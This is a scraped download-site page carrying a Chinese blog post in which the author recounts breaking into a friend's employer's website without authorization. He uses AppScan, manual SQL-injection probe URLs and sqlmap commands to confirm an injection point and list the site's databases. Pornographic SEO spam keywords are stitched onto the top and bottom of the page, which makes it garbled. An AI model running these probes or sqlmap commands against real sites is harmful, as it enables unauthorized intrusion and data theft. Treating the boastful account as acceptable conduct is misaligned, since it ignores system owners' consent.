在线观看www成人影院-在线观看www日本免费网站-在线观看www视频-在线观看操-欧美18在线-欧美1级

您好,歡迎來電子發燒友網! ,新用戶?[免費注冊]

您的位置:電子發燒友網>源碼下載>數值算法/人工智能>

SQL工具注入攻破這家互聯網公司

大小:0.5 MB 人氣: 2017-10-11 需要積分:1
最近在研究Web安全相關的知識,特別是SQL注入類的相關知識。接觸了一些與SQL注入相關的工具。周末在家閑著無聊,想把平時學的東東結合起來攻擊一下身邊某個小伙伴去的公司,看看能不能得逞。不試不知道,一試還真TM得逞了,內心有些小激動,特在此寫博文一篇,來記錄下我是如何一步步攻破這家互聯網公司的。
  【作案工具介紹】
  (1) AppScan滲透掃描工具
  Appscan是Web應用程序滲透測試舞臺上使用最廣泛的工具之一。它是一個桌面應用程序,它有助于專業安全人員進行Web應用程序自動化脆弱性評估。
  (2) Sqlmap滲透測試工具
  Sqlmap是一個自動化的SQL注入工具,其主要功能是掃描,發現并利用給定的URL的SQL注入漏洞。
  【作案細節如下】
  首先使用Appscan工具,對www.xxx.com互聯網公司的官網進行掃描,掃描結果如下:
  SQL工具注入攻破這家互聯網公司
  在這56個安全性問題中,找到你感興趣的鏈接,例如下面這條:
  http://www.xxx.com/system/cms/show?id=1
  為何要挑出這一條呢?因為它對于SQL注入比較典型,下面普及下SQL注入常用手法。首先用如下語句,確定該網站是否存在注入點:
  http://192.168.16.128/news.php?id=1原網站
  http://192.168.16.128/news.php?id=1’ 出錯或顯示不正常
  http://192.168.16.128/news.php?id=1and 1=1 出錯或顯示不正常
  http://192.168.16.128/news.php?id=1and 1=2 出錯或顯示不正常
  如果有出錯,說明存在注入點。
  在判斷完http://www.xxx.com/system/cms/show?id=1該鏈接存在注入點后,接下來就啟動我們的滲透測試工具Sqlmap,進行下一步的注入工作,詳細過程如下:
  1) 再次確認目標注入點是否可用:
  python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1
  參數
  -u:指定注入點url
  結果:
  SQL工具注入攻破這家互聯網公司
  注入結果展示:
  a. 參數id存在基于布爾的盲注,即可以根據返回頁面判斷條件真假的注入。
  b. 參數id存在基于時間的盲注,即不能根據頁面返回內容判斷任何信息,用條件語句查看時間延遲語句是否執行(即頁面返回時間是否增加)來判斷。
  c. 數據庫類型為:MySql 5.0.12
  2) 暴庫所有數據庫:
  一條命令即可曝出該sqlserver中所有數據庫名稱,命令如下:
  python sqlmap.py -u http://www.xxx.com/system/cms/show?id=1–dbs
  參數:
  –dbs:dbs前面有兩條杠,列出所有數據庫。

非常好我支持^.^

(0) 0%

不好我反對

(0) 0%

      發表評論

      用戶評論
      評價:好評中評差評

      發表評論,獲取積分! 請遵守相關規定!

      ?
      主站蜘蛛池模板: 美女一级毛片免费观看| 久久综合爱| 成人av.com| 爱爱的免费视频| 在线免费国产| 天天插日日插| 国产特黄一级一片免费| 亚洲精品国产美女在线观看| 男人午夜网站| 伊人7| 特黄特色网站| 欧美一级乱理片免费观看| 看全色黄大色大片免费久久怂| 狠狠色综合网站久久久久久久| 国产精品成人四虎免费视频| 一级片免费看| 久草资源在线播放| 丁香网五月天| 免费高清成人啪啪网站| 亚洲一区在线观看视频| 综合婷婷丁香| 亚洲高清视频一区| 嘿嘿嘿视频在线观看网站| 亚州1区2区3区4区产品乱码2021 | 成年大片免费视频播放手机不卡 | 日本不卡高清免费v日本| 四虎www.| 男人的天堂视频在线| 国产精品久久婷婷六月丁香| 天天射夜夜操| 日韩高清在线日韩大片观看网址| 日本高清免费aaaaa大片视频| 天天狠狠弄夜夜狠狠躁·太爽了| 你懂的在线观看网站| 成年大片免费视频播放手机不卡| 久色乳综合思思在线视频| 91大神网址| 日本在线视频不卡| 天堂bt在线网bt| 黄色地址| 欧美夜夜|